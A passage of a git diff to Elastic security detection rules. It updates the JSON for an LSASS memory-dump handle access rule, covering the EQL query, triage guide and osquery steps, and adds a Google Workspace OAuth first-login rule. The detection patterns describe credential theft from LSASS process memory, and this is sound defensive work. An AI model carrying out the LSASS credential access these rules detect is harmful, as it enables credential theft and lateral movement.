correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json index 22b86f2466c..cc99d16b111 100644 --- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json +++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_109.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. */\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\poqexec.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", - "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json b/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json index a3903c7e7a1..70983709e41 100644 --- a/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/210d4430-b371-470e-b879-80b7182aa75e_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json index b0d2de243ef..1d1dbd9ea49 100644 --- a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_1.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json index 73178c0d306..d40b726fbc5 100644 --- a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_2.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3.json new file mode 100644 index 00000000000..8eacb28d26c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first time a third-party application logs in and authenticated with OAuth. OAuth is used to grant permissions to specific resources and services in Google Workspace. Compromised credentials or service accounts could allow an adversary to authenticate to Google Workspace as a valid user and inherit their privileges.", + "false_positives": [ + "Developers may leverage third-party applications for legitimate purposes in Google Workspace such as for administrative tasks." + ], + "from": "now-130m", + "history_window_start": "now-15d", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Google Workspace OAuth Login from Third-Party Application", + "new_terms_fields": [ + "google_workspace.token.client.id" + ], + "note": "## Setup\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset: \"google_workspace.token\" and event.action: \"authorize\" and\ngoogle_workspace.token.scope.data.scope_name: *Login and google_workspace.token.client.id: *apps.googleusercontent.com\n", + "references": [ + "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one", + "https://developers.google.com/apps-script/guides/bound", + "https://developers.google.com/identity/protocols/oauth2" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.token.client.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.token.scope.data.scope_name", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "21bafdf0-cf17-11ed-bd57-f661ea17fbcc", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Defense Evasion", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.001", + "name": "Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1550/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "21bafdf0-cf17-11ed-bd57-f661ea17fbcc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json index 504bc6e26e4..ac4918bde95 100644 --- a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json index f3bee61c2ce..e5b871f3a6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_4.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json index 9e9f5228dd3..eab0133a4b2 100644 --- 